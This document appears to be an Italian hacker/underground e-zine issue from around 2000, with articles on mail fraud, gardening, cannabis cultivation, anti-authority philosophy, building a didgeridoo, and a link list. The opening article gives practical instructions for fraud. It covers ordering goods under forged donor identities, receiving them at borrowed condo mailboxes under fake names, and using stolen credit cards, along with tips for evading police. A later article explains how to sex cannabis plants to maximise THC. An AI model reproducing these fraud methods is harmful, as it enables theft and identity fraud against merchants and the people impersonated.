---------------------------------------------------------------[ sKamMinG ]---
===] LA TRUFFA POSTALE ]======================================================
-----[ mR_bIs0n ]-------------------------------------------------------------



Consumo: ho la brutta abitudine di iniziare gli art prima di mangiare... eheh
Abbigliamento: mutande (gialle davanti e marroni dietro) e kannottiera...
Musica ascoltata: un po'di tutto del momento... naturalmente in MP3!!!

Saluti a: Biby, Piccinni, Panino, Luigi, Faby e Simy (senn• ki le sente...),
qualkun'altro ke non rikordo, il kanale #Phreak.it, tutti quelli di
AIS, XaRaBaS, gli operatori Telekom a kui ho rubato tanta roba...

Fankulo a: i prof. di merda, alla skuola bastarda, a tutti i Lamerini, a ki mi
sta sul kaxxo...

Dedicato a: tutte le belle gnokke ke ci sono in Italia, e a quella scema
dell'Ilaria ke prima di fidanzarsi kon qualkuno si fa le pere...
---

Beeeeeeeeeneeeeeeeee, kome va? Tutto bien? Vi state divertendo? Bravi...
PerkŠ kazzo sto a dire ste kavolate???

.------------------------------------.
| Indice |
| 1)Intro |
| 2)Truffa da casa propria | <--- Mitiko!!!
| 3)Truffa da casa altrui |
| 5)Karta di kredito |
| 6)Riski |
| 7)Kazzate ke mi verranno in mente... |
ø-------------------------------------'

- Intro
Oggi vi illustrer• varie teknike per la truffa via posta... ovvero il
mail - truffing!!! Si, proprio, kos... farsi arrivare a kasa roba senza
pagarla, ovviamente...
Non uso disclaimer, quindi se i carabinieri o kikkessi… vi arrestano per
quello ke avete fatto leggendo qui (per fare un esempio, mettiamo ke avete
letto kome fare a farsi un abbonamento ad una rivista, e voi vi fate una pera)
io sono il responsabile, il mio nome Š Fabio Fanizza, oppure se vi piace di +
Giuseppe Pasanisi, ditelo pure!!!
A parte gli skerzi a me non me ne pu• fregare un kazzo, tanto la pula o i
carramba o quegli str***i della G.D.F. non sann• nulla di me! AHAHAH (risata
sadika)...

- Truffa da casa propria
Oki, la truffa da casa propria consiste nel far arrivare della roba a casa
vostra... voi direte "ceeeeeerto! E la pago io!" NO! E'qui ke vi sbagliate,
infatti i metodi ke vi illustrer• faranno in modo ke voi non centriate un
benamato kazzo...
Bene, mettiamo ke volete abbonarvi a Topolino... A TOPOLINO??? Ma ke kazzo
leggete? Evidentemente avete avuto problemi da pikkoli... dicevamo? Ah si!
Volete abbonarvi a Topolino, bene non dovete fare altro ke trovare una
kartolina d'abbonamento nelle riviste o nel Topolino stesso... ma attenzione!
La cartolina deve essere di quelle ke possono regalare l'abbonamento! EHHEHE!
CioŠ, una persona (es. Fabio Fanizza) vuole regalare un abbonamento a Topolino
(casualmente) a voi... bene questa kartolina lo permette! BENE!!! Quindi kol
fidato GenerID riempiamo la cartolina kon le generalit… del "donatore", mentre
nella sezione "donato" mettiamo i nostri datucci!!! Fatto? Bravi! Ora kome
modalit… di pagamento usiamo i bollettini, quanti pi— possibili! Mirakkomando
usate un paesino sperduto magari nella Valle D'Aosta per la residenza del
"donatore"!!! Presto vi arriver… il vostro amato giornalino (ma Topolino se la
scopa mai Minnie???)!
Sikkome avete ordinato una kosa ke arriva ogni settimana, forse potrebbero,
quei bastardi della Walt Disney Italia, accorgersene ke i soldi non
arrivano... e potrebbero non inviare + un caxxo... bastardi...
Il bello di tutto sta ke voi non centrate davvero un caxxo! Infatti non avete
rikiesto voi l'abbonamento quindi siete puliti! Se poi qualkuno (ignoro ki) vi
akkusa di averlo rikiesto voi potrete sempre dire: "Kekazzvuoi?
(Questo Š opzionabile), Kiunkue avrebbe potuto fare l'abbonamento per farmi
uno skerzo! Fottiti (Idem)"
...
Mettiamo ora ke ora avete visto una kosa ke vi serve ma nella kartolina non
c'Š la sezione del "donatore"... ke bastardi... vabbŠ poko male... leggete +
avanti...

- Truffa da casa altrui
Bene, volete komprarvi qualkosa o farvi abbonamento a kualkos'altro... nulla
di + facile se per puro kaso avete qualke vostro amiko ke abita in un
kondominio... ehehheh sapete ke ci sono tantiiiissssiiimeee cassette di
posta... bene baster… usarne una libera e appicircarvici un nome a cazzo
(Es. Giuseppe Pasanisi)... fatto ci• fate in modo ke la roba rikiesta sia
pagata tramite bollettini... eheheh il gioko Š fatto!!!

Skusate devo pisciare...
fatto!
Mi Š venuta fame (non mi sono nemmeno lavate le mani... hiihihih)

Lettore skoglionato : "Ma ke palle! Mo'in mezzo all'artikolo questo si mette a
a mangiare senza nemmeno lavarsi le mani..."

Vabbene!

Dicevamo per kaso ke un ragazzo non pu• pi— divertirsi dopo essere andato a
Teatro??? Ah no!

Oki, ma mettiamo ke kuello ke volete purtroppo kosta parekkio e bisogna
pagarlo o per contrassegno (soldi in contanti al corriere) o per karta di
kredito... leggete + avanti...

- Karta di kredito
Bene, bene... questo metodo Š mooolto teoriko, per il fatto ke per avere una
karta di kredito ce ne vuole... comunque per prokurarsela leggetevi l'art di
XaRaBaS su NewBies 5... oppure hackate visa.com kome mio cuggino...
bene una volta avuta questa benedetta karta non dovete fare altro ke trovare
una buona ubikazione per fare arrivare la roba... per esempio in un
kondominio... bene, ora fate l'ordine, ma attenzione utilizzate una generalit…
fasulla... poi non mettete nessun numero telefoniko... se per ricevere la
roba c'Š bisogno di essere rikiamati, kiamate da kabina voi dicendo ke per
motivi di lavoro non avete il telefono a kasa... bene... dite anke ke per la
roba deve arrivare possibilmente verso un certo orario e giorno (a voi +
comodi), tanto kon la karta potete rikiedere kualsiasi metodo di spedizione!
IHIHIHIH!!! Pure kuello ke ti arriva entro 1 giorno... eheheh tanto mika
pagate voi! Una volta fatto tutto aspettate sotto nel kondominio il corriere
firmate e vi portate via la roba...

- Riski
Bene, dovete sapere ke per il metodo di truffa da casa, non ci sono problemi,
se proprio volete essere sikuri, kiamate l'ufficio abbonamenti della rivista
o giornale ke sia e fatevi spedire un fax dove dice ke voi non centrate un
kazzo kon la roba ke vi arriva regalata...
Per la truffa da casa altrui, invece, il diskorzo kambia... non usate sempre
la stessa ubikazione, state attenti a quei bast***i della G.D.F.... per
essere sikuri fate saltare in aria la loro kaserma del ka**o...
Per la karta di kredito state molto attenti... se fate un ordine da Internet
allora non basta usare un proxy... vedete un po'voi... se lo fate da
kartolina, da telefono (kabina ovviamente), fax (anonimo) o altro ke Š
assolutamente anonimo va bene... Non siate stupidi...


- Kazzate ke mi verranno in mente
Oki siamo arrivati alla fine dell'art... vi ringrazio tutti quanti i miei
ammiratori... alle ammiratrici (tre: una celebro-lesa, una kon gravi
malformazioni all'alluce del piede destro e una ke si krede McGyver e kon un
temperino e un rotolo di scotch mi costruisce un cellulare satellitare...)
(spero ke non ci siano lettori ke potrebbero offendersi per il fatto ke sono
celebro-lesi, o ke abbiano malformazioni all'alluce del piede destro o ke si
kredono McGyver... skusate)
Mo'ke vi diko +??? Kazzo sono le 3.15 e ci• il corso di potenziamento di
matematika... seeeeee corso di rekupero!!!
Quindi vi saluto e vi lascio una favoletta ke non centra un kazzo kon tutto!

La volpe, il gatto e la iena
Un bel giorno una volpe e un gatto si contendevano un pezzo di karne
di allevamento proveniente da Cernobil... mentre bisticciavano una iena,
rapidamente, tolse il pezzo di karne e lo inghiott andandonese allegro
allegro! Morale della favola, tra i due litiganti il terzo muore intossikato.

CIAOOOOOOOOOOOOooooooooooooo.............

---mR_bIs0n---

--------------------------------------------------------------[ gArDenInG ]---
===] MODALITA' DI SEMINA ]====================================================
-----[ zio`sP3nky ]-----------------------------------------------------------


Autore : zio`sP3nky
Mail : sp3nky@freemail.it

Un saluto a tutti i centri sociali di Roma ( vi pasto st• file dovesse
tornarvi utile ) :


-[NDR: La Lista dei CS di Roma si trova alla fine dell'e-zine]-


/me pensa : <<...Oi! ke faticaccia!!!>>

Saluto di + michell9&Yoghi, valv0, N0bodY, Dante Alighieri ,smav ed anke
#ahccc ( lili1,Axis,Dvd,TheDuke,vecna,Vaffa,loox,Lubna,Dalila,Jammina,vj e poi
le altre 2 svizzere ke non rikordo kome si kiamano :\ )

Dedicato all'Elisa e ai girasoli..

Dunkue dunke....mettiamo le kose in kiaro....non ho potuto studiare l'SS7 e
ora vi leggete kuesto stupendo artikolo sul " Giardinaggio di zio`sP3nky ".
Contenti?!?

/me non sente gli applausi...

VabbŠ...spero ke almeno lili1 lo legga... ( ciao lili :* )

Essendo cresciuto in mezzo all'erba ( da fum… :) ) mi Š sempre piaciuto vedere
le piante...in casa , all'aperto , etc etc....

Mi hanno sempre fatto cagare le piante comprate...perkŠ non l'ho fatte nascere
io....
Apparte kuesto si komicia...

z0e : si komincia a far ke?
zIo : boh...

Vediamo vediamo.....a giugno potreste piantare ankora i girasoli..davvero
belli no?..provateci ma Š tardi....oppure potete piantarvi una pianta di
zukkine....ke Š molto decorativa e buona ( se non vi piacciono i fiori fritti
andate a farvi fottere >:\ ) .

]---> Le piante a seme.

Per far crescere una pianta ( e non solo kuelle di maria ) mika metterete i
semi a terra subito , no ?!?

z0e : ah!!! ekko perkŠ l'anno passato su 1o semi di maria sono uscite 2
piante di kuasi maria !!!
zIo : brava strunza. zIo d0cEt.


Kuindi mettere i semi a mollo in un bikkiere d'ackua finkŠ non escono delle
pikkole radicine bianke dalla parte + "appuntita" del seme.Inoltre dovrete
cambiare l'ackua ogni tanto e non fate i koglioni ke fate lessare i semi al
sole...metteteli in un posto fresko dove l'akua non possa riskaldarsi + di
tanto ( es. accanto al picc...sulla lavatrice, lavastoviglie etc etc ).

Okkei okkei..datemi un attimino ke lancio un bestemmione a dei ragazzini per
terrorizzarli ( stanno facendo dei gavettoni ).

z0e : Maddai li hai fatti piangere!!!
zIo : ...

Ummh...( nel mentre m'Š venuta l'idea di fare il lancia gavettoni a casa )....
Okkei...mette i semi in terra kon la puntina bianka verso il basso in un
vasetto pikkolo....un seme per un vaso..non di pi—....usate solo

z0e : Tena Lady
zIo : ...makkŠ kazzo centra?!?

...dei vasetti pikkoli pikkoli....e annaffiate regolarmente e solo kon uno di
kuei kosi...ke si kiamanano nebulizzatori.

Annaffiate SOLO di mattina kuando f… fresko oppure di sera!!! Altrimenti
l'ackua nei vasi si riskalda e le piante si ustionano in un certo senso...

Kuando le piante saranno abbastanza grandine.....e il vaso gli star… un p•
stretto...( ve ne potrete accorgere se sotto al buko del vaso spuntano le
radici )...sar… ora di kambiare vaso....se avete del terreno a casa mettetele
a terra....senno mettetele in un vaso + grande possibilmente di koccio
(kuelli arancioni...).

Concimate la pianta kon kualke koncime ke si mescola kon l'ackua....ma non
mettecene troppo ke senno la pianta si rinkoglionisce e muore.

]---> Parti di Piante ke vi inkulate x strada.

Semplicissimo....basta inkularvi il rametto....( prendete i rami + giovani....
lo rikonoscete dal kolore verde + kiaro... ) e mettetelo nell'ackua finkŠ non
vi spuntano le radici....ovviamente mettete il tutto a l'ombra ed Š meglio se
ci mettete una gocciolina di concime dentro.

lasciate ke le radici siano un bel p• lunghe e mettetelo nella terra....
annaffiate regolarmente!!!

]---> Piante a Tuberi.

Una delle pi— comuni piante a tubero Š la

zIo : Figa di z0e!!! :P
z0e : Peccato stasera avevo un programmino e te lo 6 fatto
sfumare....
zIo : Oi!z0e dai io skerzavo...

Patata....oppure i gigli....l'amarillis ( Š a cipolla... ) etc etc

Pigliate la patata e la mettete a terra e annaffiate --> 'na kazzata!


Rikordo ke la pianta Š una kosa vivente..non solo una semplice kosa di
abbellimento!!!!

---zio`sP3nky---

-----------------------------------------------------------------[ nArcO$ ]---
===] DISTINZIONE DEI SESSI ]==================================================
-----[ OldirOn61 ]------------------------------------------------------------

Buon Salve a tutti!!!!
Dopo aver spiegato come far crescere e come fertilizzare correttamente le
nostre amate piantine, passiamo alla fase piu' delicata ed inportante del
ciclo di crescita della Canapa: la fioritura e la conseguente distinzione dei
sessi.

Perche' e' cosi' importante??? Semplicemente perche' grazie alla fioritura
riusciremo a distinguere le piante maschili da quelle femminili, che come gia'
detto nei precedenti numeri di AiS, contengono una percentuale di THC molto +
elevata di quelle maschili....

Dopo circa 6/10 settimane in cui le piante sono soggette ad un fotoperiodo
lungo (circa 16/18 ore di luce giornaliere) e' necessario "accorciare" il
fotoperiodo stesso a circa 12/13 ore di luce al giorno...
In questo modo la canapa comincera' a fiorire, ed a seconda del proprio sesso,
fiorira' in una delle due varianti, che ora spiegero'.

=] PIANTE MASCHILI [=

I fiori maschili si trovano in piccole pannocchie ascellari, e sono formate
da circa 5 sepali gialli o rossi, che si aprono dopo aver raggiunto la
maturita' (6/8 settimane di vita) per lasciar cadere il polline contenuto
negli stami.

=] PIANTE FEMMINILI [=

I fiori femminili si rinoscono tramite un enorme ingrossamento dell'embrione,
che a mano a mano si trasformera' in una sorta di calice affusolato, da cui
nasceranno due pistilli, il cui colore puo' essere bianco, giallo o rosso.
In realta' non sembrano fiori, bensi' piccole foglie che formano pistilli a
spessi grappoli....
I pistilli non servono ad altro che catturare il polline delle piante maschili
necessario per far fecondare l'ovulo femminile, posto all'interno del calice.


A questo punto sara' necessario fare una scelta:

1)
Far impollinare le piante femmnili per far nascere semi, con conseguente
perdita di potenza (Circa il 10% del THC incluso nella pianta viene perso con
la produzione di semi);

2)
NON permettere alle piante maschili di impollinare quelle femminili per fare
un raccolto di "sinsemila" (Dallo spagnolo= senza semi), con un raccolto
decisamente + potente rispetto alla prima opzione. In questo caso e'
NECESSARIO
separare le piante femminili da quelle maschili (Leggasi: trasferirfe i maschi
in un altro posto, o viceversa) in modo da impedire l'impollinazione.

Consiglio la prima opzione per chi vuole intrapendere per l'anno prossimo
un'altra coltivazione ed e' a corto di semi, mentre la seconda scelta e'
dedicata a chi non ha problemi di disponibilita' di semi per l'anno prossimo
...

In caso di + piante femminili, consiglio vivamente di adibirne 1 a produzione
di semi, e le restanti invece a "sinsemila", in modo da avere un OTTIMO
raccolto in fatto di potenza, e contemporaneamente una discreta quantita' di
semi per l'anno prossimo...

Per chi non ha problemi di spazio, e coltiva al chiuso, esiste un'altra
possibilita': la crescita di "cloni" della pianta femmina, attraveso
le TALEE
Che cosa sono le TALEE??

In pratica le talee sono delle "porzioni di pianta madre" che, grazie al
contatto con l'acqua 24h su 24, cominciano un ciclo di radificazione...

Praticamente, "sacrificando" una pianta femmina per fare una 10ina di talee,
in circa un paio di mesi avrete ben 10 PIANTE FEMMINILI DELLO STESSO
IDENTICO TIPO DELLA PIANTA MADRE!!!!

Bella svolta eh?
Comunque questo argomento verra' discusso nel prossimo numero...

---OldirOn61---

---------------------------------------------------------------[ ThInKinG ]---
===] THE DIFFERENCE MACHINE ]=================================================
-----[ aWAy3 ]----------------------------------------------------------------


Intro:
"Basta che non fai quello che fanno gli altri". Queste erano le parole
di risposta di un uomo, un insegnante di lettere - forse più famoso
dei suoi colleghi, alla domanda insolita e spontanea di un allievo che
chiedeva cosa fare per non trovarsi tanto male nella vita.
"Ma cos'è che fanno tutti?" pensò quell'allievo.
Molto tempo dopo, quelle parole ritornarono alla mente di quel ragazzo,
quando vide che gran parte della gente era contro quell'insegnante:
tutto perchè aveva scritto un libro ritenuto scandaloso, "Ragazzi di
vita"
. Quell'uomo era stato perseguitato, trascinato davanti ad un
tribunale. Ogni cosa che egli faceva creava scandalo.
Allora quel ragazzo pensò, che se il suo professore avesse fatto tutto
ciò che gli altri fanno e avesse detto tutto ciò che gli altri dicono,
nessuno si sarebbe mai accanito contro di lui in quel modo.
Questo bastò per capire da che parte schierarsi...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

La maggior parte della gente non è libera. Vive in una società plasmata
secondo standard imposti dai media e da un sacco di altre cazzate.
E' veramente comodo (ma chi ci riesce? e chi vuole riuscirci??) stare
in quello stampo, tutti 'uguali' e tutti magnificamente alla moda.
Tutti dalla parte della ragione, perchè semplicemente dalla parte della
maggioranza.

Poi c'è una minoranza.
Una minoranza che se ne fotte delle regole imposte da un falsi
moralismi, che rifiuta e combatte le leggi ingiuste, che grida ogni
giorno con i propri mezzi in faccia ai propri governanti la propria
'sudicia' opinione.
Sono musicisti, anarchici, semplici studenti incazzati, hacker,
cracker, in una parola: cyberpunk.
Non fanno quello che fanno tutti: ognuno esprime con i propri mezzi
(dalle manifestazioni, alla musica, al crackare un sistema..) il proprio
disappunto nei confronti di qualcosa che non va.
Qualcosa che ci vuole tutti uguali - modelli - modellati - in uno
standard industriale talmente facile da gestire..."just another brick
in the wall"
dicevano musicisti di trent'anni fa quanto mai attuali...
Siamo tutti diversi, manteniamo ognuno la propria diversità, la propria
identità, il proprio stile.....cazzo, ho riletto fino a qui e ho visto
che ho usato troppo la parola "proprio" : non a caso comunque, è questa
la parola che mai nessuno vorrebbe sentirci dire, negano ad ogni
individuo la propria personalità, indipendenza.
La libertà agli occhi dei più potrebbe essere: essere tutti uguali,
non essere criticati, mal visti, emarginati, perseguitati, denunciati,
uccisi...ma non è così.
La libertà per me e per altri è un'altra cosa: è creare una piccola
macchina, una macchina della differenza, per creare un pò di caos in
questa cazzo di costruzione che vuole apparire così perfetta che si
chiama Governo, Società, Stato, Chiesa e in chissà quanti altri modi.
La dIffERenCe mAChINe lavora ogni giorno grazie ad ognuno di noi
per la libertà di pensiero, di azione, di informazione.
E se qualcuno fa un virus, hacka un sistema (senza far danni, se non
necessario, perchè lì altrimenti ci confondiamo con l'altra parte...)
non condannatelo: chiedetevi il perchè lo fa, scavate a fondo, forse
troverete un piccolo tesoro, un meccanismo che brilla al sole, una
dIffERenCe mAChINe.

E' tempo di scegliere da che parte schierarsi...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Outro:
Un ringraziamento particolare a quel professore, Pier Paolo Pasolini,
a quel ragazzo che è cresciuto e ha scritto un articolo davvero bello,
che poi mi ha portato a scrivere questo, Vincenzo Cerami, e a tutti
quelli che contribuiscono ogni giorno alla nascita e alla vita di
infinite "dIffERenCe mAChINe".
best regards,

www.nails.cjb.net
away@subdimension.com

---aWAy3---

---------------------------------------------------------------[ ThInKinG ]---
===] UN PO' DI ETICA ]========================================================
-----[ ValK ]-----------------------------------------------------------------


Eccomi qui ;) 17 anni pieno di belle speranze e di ottimi presupposti, eppure
della vita non so' nulla, 2000 anni di storia della nostra civilta',
[ndr neanke fosse la sacra scuola di okuto] e nessuno ha dato un perke' o un
kome sulla vita.

E gia', sento il predicatore in kiesa dire una marea di kazzate su un dio
buono che ci fa' scannare tra di noi e ce lo fa' fare xche' ci vuole bene,
dall'altra parte sento parlare di reincarnazioni e obbiettivi da raggiungere,
ma la realta' e' una, tutte queste religioni, tutte queste false credenze,
sono un pietoso tentativo dell'uomo di dare un perke' a tutto questo di capire
cosa e' akkaduto e perke' siamo qui, senza comprendere che non per forza il
perke' di debba essere, vorrei sapere dove e' scritto che io ho un obiettivo
su questo ammasso di Carbonio, Zinco, Ferro, Idrogeno, Ossigeno, Silicio,
Calcio, io nella mia ottusita' di Carbonio legato ad atomi di ossigeno (perke'
e' questo ke siamo), non vedo la necessita' di un incentivo, qualkuno ha detto
"io penso quindi sono" ma nessuno ha detto e provato che per pensare debbo
avere un perke', e' solo la sfrenata curiosita' dell'uomo a cercare perke'
non necessari.

Guardandomi ora mi dico: " MA XCHE' KAZZO HO STUDIATO TANTO E SON ARRIVATO
DOVE SONO ARRIVATO? "
e la risposta non la avro' mai nessuno me la puo' dare
e nessuno me la dara'.

E se tutto questo ,se l'aggregato di carbonio e silicio su kui ho passato 9
anni della mia vita, non fosse reale? se non fosse questa la nostra vita? cosa
saremmo noi in realta'? beh io ho pensato se io non fossi quello che sono
sicuramente sarei qualkos'altro ;)
Guardiamoci ora, cosa ci spinge a violare sistemi a studiare nuovi exploit a
trovare nuove strade ? la stessa curiosita' che ha spinto heinstein a studiare
l'atomo la stessa voglia di scoprire che ha spinto Madamme Curie a scoprire
la radioattivita' la stessa spinta che mi ha portato ad avvicinarmi alla
sicurezza informatica ci porta a dio? o kome kaspita lo vogliamo kiamare?
secondo me no, ma il dialogo e' aperto ...

E allora? perke' dovrei avere un etica rispettare la privacy e tutte le altre
kazzate introdotte dall'uomo? ke diritto ha un altro uomo di dirmi cosa e'
giusto fare e cosa no?

IO FACCIO TUTTO QUELLO CHE MI VA' PURKE'FACCIA IL MIO BENE

ecco la mia filosofia, io rispetto l'etika e l'etiketta xche' mi va' di farlo,
me se non dovessi piu' accettare le regole imposte dall'etica non esiterei un
solo attimo ad abbandonarla.

Quindi fate come vi pare io non vi diro' cosa e' giusto fare vi diro' solo
quello che PER ME e' giusto fare poi voi accettate, fregateve, mandatemi a
fanculo, a me di voi non me ne strafrega nulla.

valkzone@infinito.it
http://valkzone.tsx.org

---ValK---

--------------------------------------------------------------[ aLt.mUsiK ]---
===] COSTRUIAMO UN DIDGERIDU ]================================================
-----[ zio`sP3nKy ]-----------------------------------------------------------

Saluto e dedicato a : Elisa , michell9&Yoghi , valv0 , NobodY ,Martyr e
lili1.

Il Didgeridu Š uno strumento a fiato rikavato da un ramo di eukalipto svuotato
dalle termiti. Nonostante la sua semplicit… pu• produrre un'ampia variet… di
ritmi suoni e timbri.

Il canto Š la forma dominante nella cultura degli aborigeni australiani:
accompagna sia rituali informali ke rituali sacri.

Nell'Australia settentrionale il suono ronzante del didgeridu costituisce un
rikko accompagnamento alle voci.

( Almeno kos dice l'Encarta98 )

P.s. Avete mai sentito Co.Dex di Giovanni Lindo Ferretti?!?...mbhŠ all'inizio
di una kanzone ( non rikordo kuale) c'Š un didgeridu campionato....

Io almeno non ho l'eucalipto....anke se in zone tipo Salerno si trova
l'eucalipto ( sta sui lati delle strade kuasi sempre ). Peccato ke in Italia
non ci sono neanke le termiti...kui

  
ndi rimmediatevi :

-[ Una canna di bamb— di grande diametro e abbasatnza lunga...tipo
1.60 m..+ lunga Š e meglio Š!
-[ Un kualkosa di molto lungo ke buki.
-[ Lima o carta vetrata.

oPzIonAle :

-[ Kualkosa per kolorare e/o incidere.

E' semplicissimo a dirlo..un p• meno a farlo. Togliete tutti kuei kosi
ke dividono dentro le singole parti della canna.

+-----------&----------------------&------------------&--------------+
|-----------&----------------------&------------------&--------------|
|-----------&----------------------&------------------&--------------|
+-----------&----------------------&------------------&--------------+
^
-]Kanna di Bamb— vista da fuori _|


OOOO
OkosinoO
O###da###O
OsfondareO
O######O
OOOO

^
-] Vista canna di Bamb— |
dalla parte del buco ________|

Speriamo mi abbiate capito....

Dopo aver tolto kuei kosini in modo molto accurato.... levigate kon la lima o
scartavetrate kon la carta vetrata l'estremit… della canna ( la parte +
pikkola in kui soffierete ) e dategli una forma tondeggiante di modo ke kuando
suonate non vi si sfondino le labbra .

Abbellite la canna a vostro piacimento se vi v… e date sfogo alla vostra
pazzia mistika :P

-[ Kome si suona?

MbhŠ..io vi posso giusto dire kome si mettono le labbra sulla kanna e kome
soffiare...poi le sonorit… le dovrete inventare voi...

Per suonare dovrete mettere met… labbro superiore e met… labbro inferiore sul
lato della canna e soffiare facendo una prrrprrrrrrprrrrrr!!! tipo
pernakkia....tutto st… nell'esercitarsi!!!

===] UPGRADE [===

-oi!-oi!-oi!-oi!-oi!-oi!-oi!] Did Plus [-oi!-oi!-oi!-oi!-oi!-oi!-oi!-

Castel Candida Ceppa 23/o6/2ooo ----> okkei c'avevo l'orologio al
kontrario...beneeeeeeeeee!!


Dedicato a: gouranga ->( hi bRoTh!!! )
Jammina ->( :******************************************* )
Yoghi ---->( Finalmente ci siamo sentiti!!!anke se kon la
musika sotto non ci si kapiva nulla! :P :* )
Michell9-->( Oi!Oi! :** )
Elisa ---->( :********* )
Elsa288 -->( Hai una bellissima voceeeeeee! pekkato ke non
t'ho detto nulla.... :* )
lili1 ---->( :* ciauz!! )
NICKYE --->( :********************** )
valv0 ---->( yA muSt Not bE s0 bUsY! :** )
DanteAlig->( : )
N0b0 ----->( Skin&Punk N0b0!!!Oi!Oi! )
smav`----->( `a mejo :* )
Dalila --->(|_o)
mAyhEm --->( troppo bello vestito kome l'angioletti :)

Non ho un kazzo da fare...sono le 22.1o...aspetto una telefonata kuindi faccio
un upgrade dell'artikolo su kome fare un didgeridu in casa o meglio sul kome
suonare un did fatto in casa.

Per avere un bel suono un did deve essere pulito bene dentro innanzi tutto,
il ke signifika sfondare kon un tondino di ferro le membrane interne della
canna di bamb—.

Se volete potete komprare della c'era d'ape pura al 1oo% ( odora di miele ).
Immergete il barattolo di c'era d'ape in un pentolino kon dell'ackua kalda e
la fate sciogliere...ci immergete kos l'estremit… del did e girate
lentamente...prima ke si raffreddi la modellate kon le dita per farle
akuistare una superfice liscia. In kuesto modo le labbra si gonfieranno un p•
di meno kuando suonate lo strumento( soffrirete di meno :).

Io il primo suono kol did l'ho fatto davanti alla tivv mentre oziavo ...
guardando un film d'Alberto Sordi...non pensavo proprio a suonarlo, penso ke
all'inizio dovreste kominciare a non pensare sul kome far uscire il suono.

Ku ci servirebbero gli ASCii decenti per far capire la posizione...ma Š kuasi
impossibile capirlo tramite caratteri ASCii!!!!

Ve lo spiego a parole.

Mettete il did davanti alle vostre labbra e poggiatele leggeremente sul buko
del did. La testa deve essere un pokino inclinata ( o dx o sx, dipende da
kome vi sentite komodi ),poikŠ sul did dovrete poggiare met… labbra.

Ora kominciate a spernakkiare l dentro...il suono lo dovete dare voi
modulando la bokka, l'importante Š ke mentre spernakkiate fate un suono tipo
uuuuuuuhhhhhuhhhuuuuuuuuuhhuhhhhhuuhuhhh oppure rrrrroooorrrroo-
oooorooooooooroooooorrooooo...vabbŠ ci siamo cabiti...dovete trovare suoni
molto tribali...molto tribali non tipo Pantera [ Smerdera ] o l'altri
koyoni...
kome si kiamano? Friggitura? Smerdatura? ah s...Sepultura
[ o Sepoltura ?!? ].

:P Oi! Oi! Oi! Siam Fieri Di Essere Oi! Rasato e Fiero! Oi!

Okkei okkei...ki s'Š letto tutto l'art fino a ku… Š un grande ;*
Ki c'ha capito kualkosa Š ankora mejo. :0

Konsiglio a tutti di leggere l'art di mR_bIs0n sulle segreterie.
Un bel lavoro. :) ( sez. Phreaking )

Volevo precisare ke "La sagra del Prepuzio fritto" e La "Fiera degli
spazzolini da denti" di kui parlava mR_bIs0n si terr… a Santa Maria Giovanna
( protettrice dei drogati e iellatrice della pula ) in provincia di Venezia il
15/o8/1943 .

Spamming del giorno.(in kualke modo li dovremo vendere st cidd no?!?)

A tutti gli amanti della vera musika Š in vendita il cidd degli Atra
a sole 5 karte + spese di spedizione ( circa œ 25oo ) !!!
Suvvia non fate i rabbini e mailate per maggiori info a atra@freemail.it ! :)

il mattino ha l'oro in bokka Lo zio`sP3nK controlla.
mhehihi!ciao ciao


Mailate per kualsiasi kosa a : sp3nky@freemail.it

---zio`sP3nKy---

###################
### ###
### -[ 0UtR0 ]- ###
### ###
###################

------------------------------------------------------------------[ lInKs ]---
===] HOTWEB ]=================================================================
-----[ ]CyBOrG[ ]-------------------------------------------------------------

..........
HaCkTiViSm
°°°°°°°°°°
Alcei -ITA-
http://www.alcei.it/

Xs4All
http://www.xs4all.net/

Hacker News Network
http://www.hackernews.com/

.......
DiSiNfO
°°°°°°°
Kontro Kultura -ITA-
http://www.geocities.com/kontrokultura/

Mondo Underground Webzine -ITA-
http://www.geocities.com/SoHo/Cafe/8541/

Disinfo
http://www.disinfo.com/

Tactical Media Crew -ITA-
http://www.tmcrew.org

Zeus News -ITA-
http://www.zeusnews.com/

Punto informatico -ITA-
http://www.punto-informatico.it/

..............
CoMuNiC-aZiOnE
°°°°°°°°°°°°°°
SocialMedia -ITA-
http://ospiti.ingredium.it/socialmedia/

Net Institute -ITA-
http://net-i.zkm.de/

Noam Chomsky Archive -ITA-
http://pages.hotbot.com/edu/chomsky.it/index.html

MediaMente -ITA-
http://www.mediamente.rai.it

Golem -ITA-
http://www.grr.rai.it/golem/

Radio Cybernet -ITA-
http://www.kyuzz.org/radiocybernet/

.Zip -ITA-
http://www.ecn.org/zip/

Strano Network -ITA-
http://strano.net/

Luther Blissett -ITA-
http://www.lutherblissett.net/

.........
CyBeRpUnK
°°°°°°°°°
Neural -ITA-
http://www.neural.it/

Settore Cyberpunk -ITA-
http://www.ecn.org/settorecyb/

.....
CrImE

Criminology -ITA-
http://jump.to/marcocal

...........
UnDeRgRoUnD
°°°°°°°°°°°
PeaceLink -ITA-
http://www.peacelink.it/

Sherwood -ITA-
http://www.sherwood.it/

Contropiani -ITA-
http://www.contropiani2000.org/

Adbusters
http://www.adbusters.org/

Anarcociclismo -ITA-
http://www.kyuzz.org/anarcociclismo/

European Counter Network -ITA-
http://www.ecn.org

.........
CyBeR-aRt

Masters -ITA-
http://masters.imd.it/

0100101110101101
http://www.0100101110101101.org/

.....
SpAcE

Associazione Astronauti Autonomi -ITA-
http://www.geocities.com/CapeCanaveral/Launchpad/3066/

Men In Red -ITA-
http://www.kyuzz.org/mir/

........
CyBeRlAw
°°°°°°°°
Interlex -ITA-
http://www.interlex.it/

Andrea Monti -ITA-
http://www.andreamonti.org/

.......
PrYvAcY
°°°°°°°
I CTRL U -ITA-
http://members.xoom.it/IctrlU/

Infotec -ITA-
http://www.gardaweb.it/

..........
AnTi-CleRo

Bambini di Satana -ITA-
http://www.bambinidisatana.it

BeatoPio
http://www.anticlero.com

.................
MoToRi-Di-RiCeRcA
°°°°°°°°°°°°°°°°°
HotBot
http://www.hotbot.com

.................
MoToRi-Di-RiCeRcA

Altavista
http://www.altavista.com/

AltraVista -ITA-
http://www.ecn.org/altravista/

AntiOnline
http://www.antionline.com/

AstaLaVista
http://astalavista.box.sk/

Avatar Search
http://www.avatarsearch.com/

NewOrder
http://neworder.box.sk/


------------------------------------------------------------------[ lInKs ]---
===] -ROMA- LISTA CENTRI SOCIALI (CS/CSA/CSOA/CSIOA) ]========================
-----[ sP3nKy ]---------------------------------------------------------------

Lab 00128 ---> http://www.tmcrew.org/csa/lab00128/index.htm
